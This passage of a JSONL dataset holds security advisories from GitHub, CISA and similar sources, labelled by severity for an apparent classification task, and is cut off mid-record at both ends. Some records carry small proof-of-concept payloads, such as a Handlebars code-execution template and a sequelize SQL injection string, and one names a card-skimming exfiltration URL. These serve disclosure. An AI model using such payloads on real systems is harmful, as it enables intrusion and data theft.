filenames, allowing attackers to execute arbitrary JavaScript in the victim's browser through files with names containing malicious code.\n\n## Recommendation\n\nNo fix is currently available, consider using an alternative package until a fix is made available.", "text_raw": "Cross-Site Scripting in min-http-server\n\n[Severity: MEDIUM]\n\nAll versions of `min-http-server` are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize filenames, allowing attackers to execute arbitrary JavaScript in the victim's browser through files with names containing malicious code.\n\n\n## Recommendation\n\nNo fix is currently available, consider using an alternative package until a fix is made available.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-07-31", "split": "train"} -{"id": "9c4fa9c282a57259896a", "text": "Denial of Service in nes\n\nAffected versions of `nes` are vulnerable to denial of service when given an invalid `cookie` header, and websocket authentication is set to `cookie`. Submitting an invalid cookie on the websocket upgrade request will cause the node process to throw and exit.\n\n## Recommendation\n\nUpdate to version 6.4.1 or later.", "text_raw": "Denial of Service in nes\n\n[Severity: HIGH]\n\nAffected versions of `nes` are vulnerable to denial of service when given an invalid `cookie` header, and websocket authentication is set to `cookie`. Submitting an invalid cookie on the websocket upgrade request will cause the node process to throw and exit.\n\n\n## Recommendation\n\nUpdate to version 6.4.1 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-24", "split": "train"} -{"id": "d6db18f1b83e56d5692f", "text": "Prototype Pollution in json-ptr\n\nThis affects the package `json-ptr` before `3.0.0`. A type confusion vulnerability can lead to a bypass of CVE-2020-7766 when the user-provided keys used in the pointer parameter are arrays.", "text_raw": "Prototype Pollution in json-ptr\n\n[Severity: MEDIUM]\n\nThis affects the package `json-ptr` before `3.0.0`. A type confusion vulnerability can lead to a bypass of CVE-2020-7766 when the user-provided keys used in the pointer parameter are arrays.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-11-08", "split": "train"} -{"id": "c8cf06d0fc6740894396", "text": "XSS in Mapfish Print relating to JSONP support\n\n### Impact\nA user can use the JSONP support to do a Cross-site scripting.\n\n### Patches\nUse version >= 3.24\n\n### Workarounds\nNo\n\n### References\n* https://github.com/mapfish/mapfish-print/pull/1397/commits/89155f2506b9cee822e15ce60ccae390a1419d5e\n* https://cwe.mitre.org/data/definitions/79.html\n\n### For more information\nIf you have any questions or comments about this advisory Comment the pull request: https://github.com/mapfish/mapfish-print/pull/1397", "text_raw": "XSS in Mapfish Print relating to JSONP support\n\n[Severity: LOW]\n\n### Impact\nA user can use the JSONP support to do a Cross-site scripting.\n\n### Patches\nUse version >= 3.24\n\n### Workarounds\nNo\n\n### References\n* https://github.com/mapfish/mapfish-print/pull/1397/commits/89155f2506b9cee822e15ce60ccae390a1419d5e\n* https://cwe.mitre.org/data/definitions/79.html\n\n### For more information\nIf you have any questions or comments about this advisory Comment the pull request: https://github.com/mapfish/mapfish-print/pull/1397", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2020-07-07", "split": "train"} -{"id": "aea5c65e146a77838547", "text": "HTTP Response Splitting in Puma\n\nIn Puma (RubyGem) before 4.3.2 and 3.12.3, if an application using Puma allows untrusted input in a response header, an attacker can use newline characters (i.e. `CR`, `LF` or`/r`, `/n`) to end the header and inject malicious content, such as additional headers or an entirely new response body. This vulnerability is known as HTTP Response Splitting.\n\nWhile not an attack in itself, response splitting is a vector for several other attacks, such as cross-site scripting (XSS).\n\nThis is related to CVE-2019-16254, which fixed this vulnerability for the WEBrick Ruby web server.\n\nThis has been fixed in versions 4.3.2 and 3.12.3 by checking all headers for line endings and rejecting headers with those characters.", "text_raw": "HTTP Response Splitting in Puma\n\n[Severity: MEDIUM]\n\nIn Puma (RubyGem) before 4.3.2 and 3.12.3, if an application using Puma allows untrusted input in a response header, an attacker can use newline characters (i.e. `CR`, `LF` or`/r`, `/n`) to end the header and inject malicious content, such as additional headers or an entirely new response body. This vulnerability is known as HTTP Response Splitting.\n\nWhile not an attack in itself, response splitting is a vector for several other attacks, such as cross-site scripting (XSS).\n\nThis is related to CVE-2019-16254, which fixed this vulnerability for the WEBrick Ruby web server.\n\nThis has been fixed in versions 4.3.2 and 3.12.3 by checking all headers for line endings and rejecting headers with those characters. ", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-02-28", "split": "train"} -{"id": "7d982df1fed8827cacbd", "text": "Path Traversal in algo-httpserv\n\nVersions of `algo-httpserv` prior to 1.1.2 are vulnerable to Path Traversal. Due to insufficient input sanitization, attackers can access server files by using relative paths.\n\n## Recommendation\n\nUpgrade to version 1.1.2 or later.", "text_raw": "Path Traversal in algo-httpserv\n\n[Severity: HIGH]\n\nVersions of `algo-httpserv` prior to 1.1.2 are vulnerable to Path Traversal. Due to insufficient input sanitization, attackers can access server files by using relative paths. \n\n\n## Recommendation\n\nUpgrade to version 1.1.2 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-09-11", "split": "train"} -{"id": "00e5a9e0d962ca3fe526", "text": "Malicious Package in freshdom\n\nVersion 0.0.6 of `freshdom` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`\n\n## Recommendation\n\nIf version 0.0.6 of this module is found installed you will want to replace it with a version before or after 0.0.6. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.", "text_raw": "Malicious Package in freshdom\n\n[Severity: CRITICAL]\n\nVersion 0.0.6 of `freshdom` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`\n\n\n\n## Recommendation\n\nIf version 0.0.6 of this module is found installed you will want to replace it with a version before or after 0.0.6. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "35b4bda664ee85d77f4d", "text": "Arbitrary Code Execution in handlebars\n\nVersions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting).\n\nThe following template can be used to demonstrate the vulnerability: \n```{{#with \"constructor\"}}\n\t{{#with split as |a|}}\n\t\t{{pop (push \"alert('Vulnerable Handlebars JS');\")}}\n\t\t{{#with (concat (lookup join (slice 0 1)))}}\n\t\t\t{{#each (slice 2 3)}}\n\t\t\t\t{{#with (apply 0 a)}}\n\t\t\t\t\t{{.}}\n\t\t\t\t{{/with}}\n\t\t\t{{/each}}\n\t\t{{/with}}\n\t{{/with}}\n{{/with}}```\n\n## Recommendation\n\nUpgrade to version 3.0.8, 4.5.2 or later.", "text_raw": "Arbitrary Code Execution in handlebars\n\n[Severity: HIGH]\n\nVersions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting).\n\nThe following template can be used to demonstrate the vulnerability: \n```{{#with \"constructor\"}}\n\t{{#with split as |a|}}\n\t\t{{pop (push \"alert('Vulnerable Handlebars JS');\")}}\n\t\t{{#with (concat (lookup join (slice 0 1)))}}\n\t\t\t{{#each (slice 2 3)}}\n\t\t\t\t{{#with (apply 0 a)}}\n\t\t\t\t\t{{.}}\n\t\t\t\t{{/with}}\n\t\t\t{{/each}}\n\t\t{{/with}}\n\t{{/with}}\n{{/with}}```\n\n\n## Recommendation\n\nUpgrade to version 3.0.8, 4.5.2 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-04", "split": "train"} -{"id": "9d41de6647377f30eb96", "text": "URIjs Hostname spoofing via backslashes in URL\n\n### Impact\nIf using affected versions to determine a URL's hostname, the hostname can be spoofed by using a backslash (`\\`) character as part of the scheme delimiter, e.g. `scheme:/\\hostname`. If the hostname is used in security decisions, the decision may be incorrect.\n\nDepending on library usage and attacker intent, impacts may include allow/block list bypasses, SSRF attacks, open redirects, or other undesired behavior.\n\nExample URL: `https:/\\expected-example.com/path`\nEscaped string: `https:/\\\\expected-example.com/path` (JavaScript strings must escape backslash)\n\nAffected versions incorrectly return no hostname. Patched versions correctly return `expected-example.com`. Patched versions match the behavior of other parsers which implement the [WHATWG URL specification](https://url.spec.whatwg.org/), including web browsers and [Node's built-in URL class](https://nodejs.org/api/url.html).\n\n### Patches\nVersion 1.19.6 is patched against all known payload variants.\n\n### References\nhttps://github.com/medialize/URI.js/releases/tag/v1.19.6 (fix for this particular bypass)\nhttps://github.com/medialize/URI.js/releases/tag/v1.19.4 (fix for related bypass)\nhttps://github.com/medialize/URI.js/releases/tag/v1.19.3 (fix for related bypass)\n[PR #233](https://github.com/medialize/URI.js/pull/233) (initial fix for backslash handling)\n\n### For more information\nIf you have any questions or comments about this advisory, open an issue in https://github.com/medialize/URI.js\n\n### Reporter credit\n[Yaniv Nizry](https://twitter.com/ynizry) from the CxSCA AppSec team at Checkmarx", "text_raw": "URIjs Hostname spoofing via backslashes in URL\n\n[Severity: HIGH]\n\n### Impact\nIf using affected versions to determine a URL's hostname, the hostname can be spoofed by using a backslash (`\\`) character as part of the scheme delimiter, e.g. `scheme:/\\hostname`. If the hostname is used in security decisions, the decision may be incorrect.\n\nDepending on library usage and attacker intent, impacts may include allow/block list bypasses, SSRF attacks, open redirects, or other undesired behavior.\n\nExample URL: `https:/\\expected-example.com/path`\nEscaped string: `https:/\\\\expected-example.com/path` (JavaScript strings must escape backslash)\n\nAffected versions incorrectly return no hostname. Patched versions correctly return `expected-example.com`. Patched versions match the behavior of other parsers which implement the [WHATWG URL specification](https://url.spec.whatwg.org/), including web browsers and [Node's built-in URL class](https://nodejs.org/api/url.html).\n\n### Patches\nVersion 1.19.6 is patched against all known payload variants.\n\n### References\nhttps://github.com/medialize/URI.js/releases/tag/v1.19.6 (fix for this particular bypass)\nhttps://github.com/medialize/URI.js/releases/tag/v1.19.4 (fix for related bypass)\nhttps://github.com/medialize/URI.js/releases/tag/v1.19.3 (fix for related bypass)\n[PR #233](https://github.com/medialize/URI.js/pull/233) (initial fix for backslash handling)\n\n### For more information\nIf you have any questions or comments about this advisory, open an issue in https://github.com/medialize/URI.js\n\n### Reporter credit\n[Yaniv Nizry](https://twitter.com/ynizry) from the CxSCA AppSec team at Checkmarx", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-03-01", "split": "train"} -{"id": "6b7c04a7baf9f48a0be7", "text": "LogicalDOC Enterprise 7.7.4 Multiple Directory Traversal Vulnerabilities", "text_raw": "LogicalDOC Enterprise 7.7.4 Multiple Directory Traversal Vulnerabilities\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2018-02-11", "split": "train"} -{"id": "a2f0d98cf7a5b3aa1c7c", "text": "Incorrect validation of `SaveV2` inputs\n\n### Impact\nThe code for `tf.raw_ops.SaveV2` does not properly validate the inputs and an attacker can trigger a null pointer dereference:\n\n```python\nimport tensorflow as tf\n\ntf.raw_ops.SaveV2(\n prefix=['tensorflow'],\n tensor_name=['v'],\n shape_and_slices=[],\n tensors=[1,2,3])\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/save_restore_v2_ops.cc) uses `ValidateInputs` to check that the input arguments are valid. This validation would have caught the illegal state represented by the reproducer above.\n\nHowever, the validation uses `OP_REQUIRES` which translates to setting the `Status` object of the current `OpKernelContext` to an error status, followed by an empty `return` statement which just terminates the execution of the function it is present in. However, this does not mean that the kernel execution is finalized: instead, execution continues from the next line in `Compute` that follows the call to `ValidateInputs`. This is equivalent to lacking the validation.\n\n### Patches\nWe have patched the issue in GitHub commit [9728c60e136912a12d99ca56e106b7cce7af5986](https://github.com/tensorflow/tensorflow/commit/9728c60e136912a12d99ca56e106b7cce7af5986).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "text_raw": "Incorrect validation of `SaveV2` inputs\n\n[Severity: HIGH]\n\n### Impact\nThe code for `tf.raw_ops.SaveV2` does not properly validate the inputs and an attacker can trigger a null pointer dereference:\n\n```python\nimport tensorflow as tf\n\ntf.raw_ops.SaveV2(\n prefix=['tensorflow'],\n tensor_name=['v'],\n shape_and_slices=[],\n tensors=[1,2,3])\n```\n \nThe [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/save_restore_v2_ops.cc) uses `ValidateInputs` to check that the input arguments are valid. This validation would have caught the illegal state represented by the reproducer above.\n\nHowever, the validation uses `OP_REQUIRES` which translates to setting the `Status` object of the current `OpKernelContext` to an error status, followed by an empty `return` statement which just terminates the execution of the function it is present in. However, this does not mean that the kernel execution is finalized: instead, execution continues from the next line in `Compute` that follows the call to `ValidateInputs`. This is equivalent to lacking the validation.\n \n### Patches\nWe have patched the issue in GitHub commit [9728c60e136912a12d99ca56e106b7cce7af5986](https://github.com/tensorflow/tensorflow/commit/9728c60e136912a12d99ca56e106b7cce7af5986).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. \n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "8d0f6dd003a300081acb", "text": "Google Chromium V8 Memory Corruption Vulnerability\n\nAffected: Google Chromium V8\n\nGoogle Chromium V8 Engine has a bug in JSON.stringify, where the internal TheHole value can leak to script code, causing memory corruption. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-122, CWE-755\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Google Chromium V8 Memory Corruption Vulnerability\n\nAffected: Google Chromium V8\n\nGoogle Chromium V8 Engine has a bug in JSON.stringify, where the internal TheHole value can leak to script code, causing memory corruption. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-122, CWE-755\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "1804d4194c0241d06d7f", "text": "Malicious Package in bitcionjslib\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in bitcionjslib\n\n[Severity: CRITICAL]\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-04", "split": "train"} -{"id": "ad5113e24098e7f8af57", "text": "ExifTool Remote Code Execution Vulnerability\n\nAffected: Perl Exiftool\n\nImproper neutralization of user data in the DjVu file format in Exiftool versions 7.44 and up allows arbitrary code execution when parsing the malicious image\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-95\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "ExifTool Remote Code Execution Vulnerability\n\nAffected: Perl Exiftool\n\nImproper neutralization of user data in the DjVu file format in Exiftool versions 7.44 and up allows arbitrary code execution when parsing the malicious image\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-95\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-17", "split": "train"} -{"id": "81bf4601991ba381a154", "text": "Exposure of Resource to Wrong Sphere in org.craftercms:crafter-search\n\nInstallations, where crafter-search is not protected, allow unauthenticated remote attackers to create, view, and delete search indexes.", "text_raw": "Exposure of Resource to Wrong Sphere in org.craftercms:crafter-search\n\n[Severity: CRITICAL]\n\nInstallations, where crafter-search is not protected, allow unauthenticated remote attackers to create, view, and delete search indexes.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-12-16", "split": "train"} -{"id": "2e4e7f249dde608ad88a", "text": "XML external entity (XXE) processing ('external-parameter-entities' feature was not fully disabled))\n\nDue to an incomplete fix for [CVE-2019-9658](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9658), checkstyle was still vulnerable to XML External Entity (XXE) Processing.\n\n### Impact\n\n#### User: Build Maintainers\n\nThis vulnerability probably doesn't impact Maven/Gradle users as, in most cases, these builds are processing files that are trusted, or pre-vetted by a pull request reviewer before being run on internal CI infrastructure.\n\n#### User: Static Analysis as a Service\n\nIf you operate a site/service that parses \"untrusted\" Checkstyle XML configuration files, you are vulnerable to this and should patch.\n\nNote from the discoverer of the original CVE-2019-9658:\n\n> While looking at a few companies that run Checkstyle/PMD/ect... as a service I notice that it's a common pattern to run the static code analysis tool inside of a Docker container with the following flags:\n> ```\n> --net=none \\\n> --privileged=false \\\n> --cap-drop=ALL\n> ```\n> Running the analysis in Docker has the advantage that there should be no sensitive local file information that XXE can exfiltrate from the container. Additionally, these flags prevent vulnerabilities in static analysis tools like Checkstyle from being used to exfiltrate data via XXE or to perform SSRF.\n> \\- [Jonathan Leitschuh](https://twitter.com/jlleitschuh)\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\nPatched, will be released with version 8.29 at 26 Jan 2020.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nNo workaround are available\n\n### References\n\n- [CWE-611: Improper Restriction of XML External Entity Reference](https://cwe.mitre.org/data/definitions/611.html)\n - GitHub Issue https://github.com/checkstyle/checkstyle/issues/7468\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in https://github.com/checkstyle/checkstyle/issues", "text_raw": "XML external entity (XXE) processing ('external-parameter-entities' feature was not fully disabled))\n\n[Severity: MEDIUM]\n\nDue to an incomplete fix for [CVE-2019-9658](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9658), checkstyle was still vulnerable to XML External Entity (XXE) Processing.\n\n### Impact\n\n#### User: Build Maintainers\n\nThis vulnerability probably doesn't impact Maven/Gradle users as, in most cases, these builds are processing files that are trusted, or pre-vetted by a pull request reviewer before being run on internal CI infrastructure.\n\n#### User: Static Analysis as a Service\n\nIf you operate a site/service that parses \"untrusted\" Checkstyle XML configuration files, you are vulnerable to this and should patch.\n\nNote from the discoverer of the original CVE-2019-9658:\n\n> While looking at a few companies that run Checkstyle/PMD/ect... as a service I notice that it's a common pattern to run the static code analysis tool inside of a Docker container with the following flags:\n> ```\n> --net=none \\\n> --privileged=false \\\n> --cap-drop=ALL\n> ```\n> Running the analysis in Docker has the advantage that there should be no sensitive local file information that XXE can exfiltrate from the container. Additionally, these flags prevent vulnerabilities in static analysis tools like Checkstyle from being used to exfiltrate data via XXE or to perform SSRF.\n> \\- [Jonathan Leitschuh](https://twitter.com/jlleitschuh)\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\nPatched, will be released with version 8.29 at 26 Jan 2020.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nNo workaround are available\n\n### References\n\n - [CWE-611: Improper Restriction of XML External Entity Reference](https://cwe.mitre.org/data/definitions/611.html)\n - GitHub Issue https://github.com/checkstyle/checkstyle/issues/7468\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in https://github.com/checkstyle/checkstyle/issues\n", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-01-31", "split": "train"} -{"id": "e6e633559aee7d5ab7cb", "text": "Timing attacks in python-rsa\n\nIt was found that python-rsa is vulnerable to Bleichenbacher timing attacks. An attacker can use this flaw via the RSA decryption API to decrypt parts of the cipher text encrypted with RSA", "text_raw": "Timing attacks in python-rsa\n\n[Severity: HIGH]\n\nIt was found that python-rsa is vulnerable to Bleichenbacher timing attacks. An attacker can use this flaw via the RSA decryption API to decrypt parts of the cipher text encrypted with RSA", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-04-30", "split": "train"} -{"id": "c6efcb855f9b5b40eb60", "text": "rest-client Gem Vulnerable to Session Fixation\n\nREST client for Ruby (aka rest-client) versions 1.6.1.a until 1.8.0 allow remote attackers to conduct session fixation attacks or obtain sensitive cookie information by leveraging passage of cookies set in a response to a redirect.", "text_raw": "rest-client Gem Vulnerable to Session Fixation\n\n[Severity: CRITICAL]\n\nREST client for Ruby (aka rest-client) versions 1.6.1.a until 1.8.0 allow remote attackers to conduct session fixation attacks or obtain sensitive cookie information by leveraging passage of cookies set in a response to a redirect.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-08-13", "split": "train"} -{"id": "3f865d71b0a638492a53", "text": "Exposure of sensitive information to an unauthorized actor in HyperKitty\n\nAn issue was discovered in management/commands/hyperkitty_import.py in HyperKitty prior to 1.3.5. When importing a private mailing list's archives, these archives are publicly visible for the duration of the import. For example, sensitive information might be available on the web for an hour during a large migration from Mailman 2 to Mailman 3.", "text_raw": "Exposure of sensitive information to an unauthorized actor in HyperKitty\n\n[Severity: HIGH]\n\nAn issue was discovered in management/commands/hyperkitty_import.py in HyperKitty prior to 1.3.5. When importing a private mailing list's archives, these archives are publicly visible for the duration of the import. For example, sensitive information might be available on the web for an hour during a large migration from Mailman 2 to Mailman 3.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-06-01", "split": "train"} -{"id": "2742420d4e8de3229372", "text": "OS Command Injection in baserCMS\n\nbaserCMS versions prior to 4.4.5 allows a remote attacker with an administrative privilege to execute arbitrary OS commands via upload of malicious plugins.", "text_raw": "OS Command Injection in baserCMS\n\n[Severity: HIGH]\n\nbaserCMS versions prior to 4.4.5 allows a remote attacker with an administrative privilege to execute arbitrary OS commands via upload of malicious plugins.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-06-08", "split": "train"} -{"id": "ce0d2ee911a088de8fb1", "text": "SQL Injection in sequelize\n\nAffected versions of `sequelize` are vulnerable to SQL Injection. The function `sequelize.json()` incorrectly formatted sub paths for JSON queries, which allows attackers to inject SQL statements and execute arbitrary SQL queries if user input is passed to the query. Exploitation example:\n\n```js\nreturn User.findAll({\n where: this.sequelize.json(\"data.id')) AS DECIMAL) = 1 DELETE YOLO INJECTIONS; -- \", 1)\n});\n```\n\n## Recommendation\n\nIf you are using `sequelize` 5.x, upgrade to version 5.15.1 or later.\nIf you are using `sequelize` 4.x, upgrade to version 4.44.3 or later.", "text_raw": "SQL Injection in sequelize\n\n[Severity: CRITICAL]\n\nAffected versions of `sequelize` are vulnerable to SQL Injection. The function `sequelize.json()` incorrectly formatted sub paths for JSON queries, which allows attackers to inject SQL statements and execute arbitrary SQL queries if user input is passed to the query. Exploitation example: \n\n```js\nreturn User.findAll({\n where: this.sequelize.json(\"data.id')) AS DECIMAL) = 1 DELETE YOLO INJECTIONS; -- \", 1)\n});\n```\n\n\n## Recommendation\n\nIf you are using `sequelize` 5.x, upgrade to version 5.15.1 or later.\nIf you are using `sequelize` 4.x, upgrade to version 4.44.3 or later.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2019-10-25", "split": "train"} -{"id": "e77f48c1efaae2f61c65", "text": "Cross-Site Scripting in swagger-ui\n\nVersions of `swagger-ui` prior to 3.20.9 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize URLs used in the OAuth auth flow, which may allow attackers to execute arbitrary JavaScript.\n\n## Recommendation\n\nUpgrade to version 3.20.9 or later.", "text_raw": "Cross-Site Scripting in swagger-ui\n\n[Severity: MEDIUM]\n\nVersions of `swagger-ui` prior to 3.20.9 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize URLs used in the OAuth auth flow, which may allow attackers to execute arbitrary JavaScript.\n\n\n## Recommendation\n\nUpgrade to version 3.20.9 or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-09-11", "split": "train"} -{"id": "be0ca464f880579294fe", "text": "Cross-Site Request Forgery in Jenkins Credentials Plugin\n\nJenkins Credentials Plugin prior to 2.3.19, 2.3.15.1, 2.3.14.1, 2.3.13.1, 2.3.7.1, and 2.3.0.1 does not escape user-controlled information on a view it provides, resulting in a reflected cross-site scripting (XSS) vulnerability.\n\nJenkins Credentials Plugin 2.3.19, 2.3.15.1, 2.3.14.1, 2.3.13.1, 2.3.7.1, and 2.3.0.1 restricts the user-controlled information it provides to a safe subset.", "text_raw": "Cross-Site Request Forgery in Jenkins Credentials Plugin\n\n[Severity: MEDIUM]\n\nJenkins Credentials Plugin prior to 2.3.19, 2.3.15.1, 2.3.14.1, 2.3.13.1, 2.3.7.1, and 2.3.0.1 does not escape user-controlled information on a view it provides, resulting in a reflected cross-site scripting (XSS) vulnerability.\n\nJenkins Credentials Plugin 2.3.19, 2.3.15.1, 2.3.14.1, 2.3.13.1, 2.3.7.1, and 2.3.0.1 restricts the user-controlled information it provides to a safe subset.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-06-16", "split": "train"} -{"id": "5b4a1bcfd648a3e58a8b", "text": "Active Record allows bypassing of database-query restrictions\n\nRuby on Rails 3.0.x before 3.0.19, 3.1.x before 3.1.10, and 3.2.x before 3.2.11 does not properly consider differences in parameter handling between the Active Record component and the JSON implementation, which allows remote attackers to bypass intended database-query restrictions and perform NULL checks or trigger missing WHERE clauses via a crafted request, as demonstrated by certain \"[nil]\" values, a related issue to CVE-2012-2660 and CVE-2012-2694.", "text_raw": "Active Record allows bypassing of database-query restrictions\n\n[Severity: MEDIUM]\n\nRuby on Rails 3.0.x before 3.0.19, 3.1.x before 3.1.10, and 3.2.x before 3.2.11 does not properly consider differences in parameter handling between the Active Record component and the JSON implementation, which allows remote attackers to bypass intended database-query restrictions and perform NULL checks or trigger missing WHERE clauses via a crafted request, as demonstrated by certain \"[nil]\" values, a related issue to CVE-2012-2660 and CVE-2012-2694.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "207e048b5dddb1113728", "text": "Improper Input Validation in actionpack\n\nRuby on Rails 2.1 before 2.1.3 and 2.2.x before 2.2.2 does not verify tokens for requests with certain content types, which allows remote attackers to bypass cross-site request forgery (CSRF) protection for requests to applications that rely on this protection, as demonstrated using text/plain.", "text_raw": "Improper Input Validation in actionpack\n\n[Severity: MEDIUM]\n\nRuby on Rails 2.1 before 2.1.3 and 2.2.x before 2.2.2 does not verify tokens for requests with certain content types, which allows remote attackers to bypass cross-site request forgery (CSRF) protection for requests to applications that rely on this protection, as demonstrated using text/plain.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "8ea99361dc1a39fedaad", "text": "Docker Desktop Community Edition Privilege Escalation Vulnerability\n\nAffected: Docker Desktop Community Edition\n\nDocker Desktop Community Edition contains a vulnerability that may allow local users to escalate privileges by placing a trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\\DockerDesktop\\version-bin\\.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-732\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Docker Desktop Community Edition Privilege Escalation Vulnerability\n\nAffected: Docker Desktop Community Edition\n\nDocker Desktop Community Edition contains a vulnerability that may allow local users to escalate privileges by placing a trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\\DockerDesktop\\version-bin\\.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-732\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "20f934e89b888fb9b0bc", "text": "Incorrect Access Control vulnerability in api-platform/core\n\nAPI Platform version from 2.2.0 to 2.3.5 contains an Incorrect Access Control vulnerability in GraphQL delete mutations that can result in a user authorized to delete a resource can delete any resource. This attack appears to be exploitable via the user must be authorized. This vulnerability appears to have been fixed in 2.3.6.", "text_raw": "Incorrect Access Control vulnerability in api-platform/core\n\n[Severity: MEDIUM]\n\nAPI Platform version from 2.2.0 to 2.3.5 contains an Incorrect Access Control vulnerability in GraphQL delete mutations that can result in a user authorized to delete a resource can delete any resource. This attack appears to be exploitable via the user must be authorized. This vulnerability appears to have been fixed in 2.3.6.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-10-14", "split": "train"} -{"id": "bcec2317dc5b781fac81", "text": "Cross-Site Scripting in 